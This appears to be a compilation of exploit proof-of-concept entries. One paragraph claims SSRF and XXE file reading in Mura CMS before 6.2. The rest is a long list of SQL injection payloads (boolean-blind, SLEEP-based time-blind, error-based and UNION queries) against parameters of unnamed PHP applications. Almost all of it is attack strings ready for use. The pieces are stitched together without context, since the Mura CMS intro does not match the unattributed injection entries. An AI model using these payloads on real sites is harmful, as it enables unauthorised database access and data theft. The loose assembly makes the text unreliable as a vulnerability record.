Any user can cause Mura CMS before version 6.2 to make an HTTP request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(), so it is possible to read a file from the file system using an XXE attack.

SQL injection on [category] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/tutorial/
Parameter: category (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category=5 AND 1845=1845&keywords=xxxxx

SQL injection on [keywords] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products
Parameter: keywords (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products

SQL injection on [category] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/search_product.php?category=1 AND 8132=8132&name=xxxxx
Parameter: category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category=1 AND 8132=8132&name=xxxxx
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: category=1 AND SLEEP(5)&name=xxxxx

SQL injection on [sk] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/category.php?sk=2 AND 5895=5895
Parameter: sk (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sk=2 AND 5895=5895
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: sk=-9224 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627071,0x6a5954706679724662715071764b6f6b6b5448677770526873556c726b747079556b5341516d7559,0x716a627a71),NULL-- Pddp

SQL injection on [hid] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/hotel.php?hid=2 AND 6652=6652
Parameter: hid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hid=2 AND 6652=6652
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: hid=2 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: hid=-1685 UNION ALL SELECT NULL,CONCAT(0x7162716271,0x696b6a4c52576c76446173666d5972704d454258706146434f544c78416a52754444694864786a42,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Nqcw

SQL injection on [keywords] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/food/
Parameter: keywords (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: keywords=xxxxx' AND (SELECT 2438 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (ELT(2438=2438,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TkKa'='TkKa&order_option=1&category=1&price=1000
    Type: UNION query
    Title: Generic UNION query (NULL) - 22 columns
    Payload: keywords=xxxxx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786a71,0x497a704b724e4c4e665a556e6b626d45534a696d5a79554d726e506a686a6c5649627355675a6269,0x7162717871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hSOz&order_option=1&category=1&price=1000

SQL injection on [pd_maincat_id] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/advance-search-result.php?keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search
Parameter: pd_maincat_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: keywords=any&pd_maincat_id=1' AND SLEEP(5) AND 'aHHy'='aHHy&submit=Search

SQL injection on [category] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/book_search.php?book_name=xxxxx&category=4 AND SLEEP(5).
Parameter: category (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: book_name=xxxxx&category=4 AND SLEEP(5)

SQL injection on [category_id] parameter.
Proof of Concept (PoC):
SQLi: https://localhost/[path]/search.php?category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx
Parameter: category_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: category_id=1 AND SLEEP(5)&sub_category_id=1&search=xxxxx
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: category_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7071,0x714e746578554b6b4b4274697974755366576555457a6c6c576269474c7877744347466d6647695a,0x7176767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JpGm&sub_category_id=1&search=xxxxx